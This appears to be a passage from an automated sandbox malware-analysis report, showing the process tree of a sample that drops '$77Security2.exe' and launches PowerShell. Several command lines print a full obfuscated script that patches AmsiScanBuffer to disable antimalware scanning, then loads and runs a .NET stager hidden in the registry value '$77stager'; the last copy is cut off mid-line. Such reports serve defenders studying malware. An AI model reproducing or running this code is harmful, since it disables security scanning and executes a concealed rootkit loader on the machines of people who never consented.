C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Users\Admin\AppData\Roaming\$77Security2.exeC:\Users\Admin\AppData\Roaming\$77Security2.exe2⤵
- Executes dropped EXE
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cvPYIcsfNmKU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$FoOAbTkDwGEexK,[Parameter(Position=1)][Type]$oYmQxeIBkb)$VoPjPCNmbFP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+'e'+'',$False).DefineType(''+'M'+''+'y'+''+'D'+''+'e'+''+'l'+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+'e'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$VoPjPCNmbFP.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+'e'+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+'a'+'m'+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$FoOAbTkDwGEexK).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+'a'+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$VoPjPCNmbFP.DefineMethod('I'+[Char](110)+''+[Char](118)+'o'+[Char](107)+'e',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l',$oYmQxeIBkb,$FoOAbTkDwGEexK).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+'i'+'m'+''+[Char](101)+','+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');Write-Output $VoPjPCNmbFP.CreateType();}$yKsMlhTtauGvK=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+'l')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+[Char](111)+'so'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+'.'+''+'U'+''+'n'+''+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+'N'+'a'+''+[Char](116)+''+'i'+''+[Char](118)+'e'+[Char](77)+''+[Char](101)+''+'t'+'h'+'o'+''+[Char](100)+''+[Char](115)+'');$rTVzQUnTNYhfvf=$yKsMlhTtauGvK.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+'es'+'s'+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$AYATHPtEcYWcEnrrySh=cvPYIcsfNmKU @([String])([IntPtr]);$UDvBzvglblsqZcdBtEegMi=cvPYIcsfNmKU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SKQgfFVsRgV=$yKsMlhTtauGvK.GetMethod(''+'G'+''+'e'+''+'t'+'M'+[Char](111)+''+'d'+'u'+'l'+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'r'+'n'+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$tlmTyOEAHrQYAY=$rTVzQUnTNYhfvf.Invoke($Null,@([Object]$SKQgfFVsRgV,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+'ar'+[Char](121)+'A')));$JRZkijQJpLARFSRlZ=$rTVzQUnTNYhfvf.Invoke($Null,@([Object]$SKQgfFVsRgV,[Object](''+'V'+'i'+'r'+''+[Char](116)+''+'u'+'al'+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+'c'+[Char](116)+'')));$GaUaBmd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tlmTyOEAHrQYAY,$AYATHPtEcYWcEnrrySh).Invoke(''+'a'+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+'dl'+[Char](108)+'');$mHEtuWxjilejkabWm=$rTVzQUnTNYhfvf.Invoke($Null,@([Object]$GaUaBmd,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+'i'+''+'S'+'c'+[Char](97)+''+[Char](110)+'Bu'+'f'+''+'f'+'e'+[Char](114)+'')));$bTCodJMkXt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JRZkijQJpLARFSRlZ,$UDvBzvglblsqZcdBtEegMi).Invoke($mHEtuWxjilejkabWm,[uint32]8,4,[ref]$bTCodJMkXt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$mHEtuWxjilejkabWm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JRZkijQJpLARFSRlZ,$UDvBzvglblsqZcdBtEegMi).Invoke($mHEtuWxjilejkabWm,[uint32]8,0x20,[ref]$bTCodJMkXt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue('$'+[Char](55)+'7'+'s'+''+'t'+''+'a'+''+'g'+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:GAYXsXqrbtbF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$VgXORatQYSLMdU,[Parameter(Position=1)][Type]$fmdAuQeLLi)$VWTjjKXytuB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType('M'+[Char](121)+'D'+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+'p'+'e',''+'C'+'la'+[Char](115)+''+[Char](115)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+','+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+[Char](108)+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$VWTjjKXytuB.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+'ec'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+'m'+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$VgXORatQYSLMdU).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$VWTjjKXytuB.DefineMethod(''+'I'+''+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+''+'i'+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+'l',$fmdAuQeLLi,$VgXORatQYSLMdU).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+'i'+'m'+''+'e'+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+'g'+'e'+''+'d'+'');Write-Output $VWTjjKXytuB.CreateType();}$QpnmPjJtRIldF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+''+'W'+'i'+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+'a'+''+[Char](102)+''+[Char](101)+'N'+[Char](97)+'t'+'i'+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+[Char](100)+''+'s'+'');$IflJcnjTTPcwOl=$QpnmPjJtRIldF.GetMethod('G'+'e'+''+[Char](116)+'P'+[Char](114)+'o'+'c'+'A'+[Char](100)+'dr'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('Pu'+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+'a'+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$McJLgvofxrMQKTFDIbp=GAYXsXqrbtbF @([String])([IntPtr]);$vQTNYRKjIVBHqokYuhEifp=GAYXsXqrbtbF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jbzVXnRCsAe=$QpnmPjJtRIldF.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+'o'+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+'e'+''+[Char](108)+'32'+[Char](46)+'d'+[Char](108)+'l')));$cLcXBUTumvToJM=$IflJcnjTTPcwOl.Invoke($Null,@([Object]$jbzVXnRCsAe,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+'i'+''+[Char](98)+'r'+'a'+''+[Char](114)+'yA')));$KktfpsYDezEKawbuW=$IflJcnjTTPcwOl.Invoke($Null,@([Object]$jbzVXnRCsAe,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+''+[Char](108)+''+[Char](80)+''+'r'+''+'o'+''+'t'+''+'e'+''+'c'+'t')));$IaWhgoi=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cLcXBUTumvToJM,$McJLgvofxrMQKTFDIbp).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+'.'+[Char](100)+''+'l'+''+'l'+'');$iwRNgiNNtOgnVwkjU=$IflJcnjTTPcwOl.Invoke($Null,@([Object]$IaWhgoi,[Object]('Ams'+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+'f'+''+'f'+'er')));$oOszONJwNC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KktfpsYDezEKawbuW,$vQTNYRKjIVBHqokYuhEifp).Invoke($iwRNgiNNtOgnVwkjU,[uint32]8,4,[ref]$oOszONJwNC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iwRNgiNNtOgnVwkjU,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KktfpsYDezEKawbuW,$vQTNYRKjIVBHqokYuhEifp).Invoke($iwRNgiNNtOgnVwkjU,[uint32]8,0x20,[ref]$oOszONJwNC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+'W'+''+'A'+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+'7'+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oaawGMROotGM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$RxayeQkGwkxJvp,[Parameter(Position=1)][Type]$PGitggKKsu)$uBDakNgiYlU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+[Char](101)+''+'d'+''+[Char](68)+''+'e'+''+'l'+'e'+'g'+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+''+'d'+','+'A'+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+'o'+'Cl'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$uBDakNgiYlU.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+',Hi'+'d'+'e'+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$RxayeQkGwkxJvp).SetImplementationFlags('R'+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+'ge'+'d'+'');$uBDakNgiYlU.DefineMethod('In'+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+'H'+'i'+'d'+'e'+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+'t,V'+[Char](105)+''+[Char](114)+'tu'+'a'+''+'l'+'',$PGitggKKsu,$RxayeQkGwkxJvp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $uBDakNgiYlU.CreateType();}$MiLUAOPQOiTpv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+[Char](116)+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+'.'+''+[Char](87)+''+'i'+'n'+[Char](51)+''+'2'+''+'.'+''+[Char](85)+''+'n'+'s'+'a'+''+[Char](102)+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+[Char](105)+'ve'+[Char](77)+''+'e'+''+[Char](116)+'h'+[Char](111)+''+'d'+''+[Char](115)+'');$wFxFKNbvpDeWyq=$MiLUAOPQOiTpv.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'Pr'+[Char](111)+'cA'+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$kTtIcDFUOzulIITRmTu=oaawGMROotGM @([String])([IntPtr]);$nYKdvUhIIorXZccRKppBMR=oaawGMROotGM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$nePyIvxpqaz=$MiLUAOPQOiTpv.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+'u'+''+'l'+''+'e'+'H'+[Char](97)+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+'d'+'l'+'l')));$qjSzaRLrnszZLI=$wFxFKNbvpDeWyq.Invoke($Null,@([Object]$nePyIvxpqaz,[Object](''+'L'+''+'o'+'ad'+[Char](76)+''+[Char](105)+''+'b'+'ra'+[Char](114)+''+'y'+''+'A'+'')));$QWpNnHzofKWRjUIlT=$wFxFKNbvpDeWyq.Invoke($Null,@([Object]$nePyIvxpqaz,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'tua'+[Char](108)+''+'P'+''+[Char](114)+'o'+'t'+''+[Char](101)+'c'+[Char](116)+'')));$sgUuwfG=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qjSzaRLrnszZLI,$kTtIcDFUOzulIITRmTu).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.d'+[Char](108)+''+[Char](108)+'');$rmfenhbMapfToNHCL=$wFxFKNbvpDeWyq.Invoke($Null,@([Object]$sgUuwfG,[Object](''+[Char](65)+''+[Char](109)+'si'+'S'+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+'f'+'e'+''+[Char](114)+'')));$lfwsLiuAeS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QWpNnHzofKWRjUIlT,$nYKdvUhIIorXZccRKppBMR).Invoke($rmfenhbMapfToNHCL,[uint32]8,4,[ref]$lfwsLiuAeS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rmfenhbMapfToNHCL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QWpNnHzofKWRjUIlT,$nYKdvUhIIorXZccRKppBMR).Invoke($rmfenhbMapfToNHCL,[uint32]8,0x20,[ref]$lfwsLiuAeS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+'R'+'E'+'').GetValue(''+[Char](36)+''+'7'+''+'7'+'sta'+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JtqjVmTMwZOf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$iHdweavTvXEUwa,[Parameter(Position=1)][Type]$UdNxzPFgru)$XUEhdrZJUcO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+'e'+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+'o'+''+'r'+'y'+[Char](77)+'o'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+'y'+'D'+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+','+''+'A'+'n'+[Char](115)+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+'ss,'+'A'+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$XUEhdrZJUcO.DefineConstructor(''+'R'+'T'+[Char](83)+''+[Char](112)+'eci'+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+'Hid'+'e'+''+[Char](66)+''+[Char](121)+'S'+'i'+''+'g'+''+','+''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$iHdweavTvXEUwa).SetImplementationFlags('R'+'u'+''+'n'+'t'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+'n'+''+'a'+''+'g'+'e'+[Char](100)+'');$XUEhdrZJUcO.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+'Hi'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+'e'+'w'+''+'S'+''+'l'+''+[Char](111)+'t'+[Char](44)+''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$UdNxzPFgru,$iHdweavTvXEUwa).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+'e'+'d');Write-Output $XUEhdrZJUcO.CreateType();}$RMgGvEzZyVnAi=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+'i'+[Char](99)+''+'r'+'o'+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+'n'+''+'s'+'a'+[Char](102)+'e'+'N'+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+[Char](100)+'s');$XxkfGQgFVFiOOE=$RMgGvEzZyVnAi.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+'l'+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lAguhkMEpTWzzmmilVI=JtqjVmTMwZOf @([String])([IntPtr]);$lJAUZWQmHhyZMbfcqfhtqf=JtqjVmTMwZOf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wpWiHtNPUvy=$RMgGvEzZyVnAi.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+''+[Char](111)+'du'+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$PvrzVfCquKwVbN=$XxkfGQgFVFiOOE.Invoke($Null,@([Object]$wpWiHtNPUvy,[Object](''+'L'+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$RcoQamvUyhAVWiAaJ=$XxkfGQgFVFiOOE.Invoke($Null,@([Object]$wpWiHtNPUvy,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+'c'+[Char](116)+'')));$pAWFxHw=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PvrzVfCquKwVbN,$lAguhkMEpTWzzmmilVI).Invoke(''+[Char](97)+''+[Char](109)+'si'+'.'+''+[Char](100)+'l'+[Char](108)+'');$JFKnQDBgFostmqrax=$XxkfGQgFVFiOOE.Invoke($Null,@([Object]$pAWFxHw,[Object](''+'A'+'m'+[Char](115)+''+'i'+'S'+[Char](99)+'a'+'n'+'B'+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+'r'+'')));$nsVMiFawSU=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RcoQamvUyhAVWiAaJ,$lJAUZWQmHhyZMbfcqfhtqf).Invoke($JFKnQDBgFostmqrax,[uint32]8,4,[ref]$nsVMiFawSU);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JFKnQDBgFostm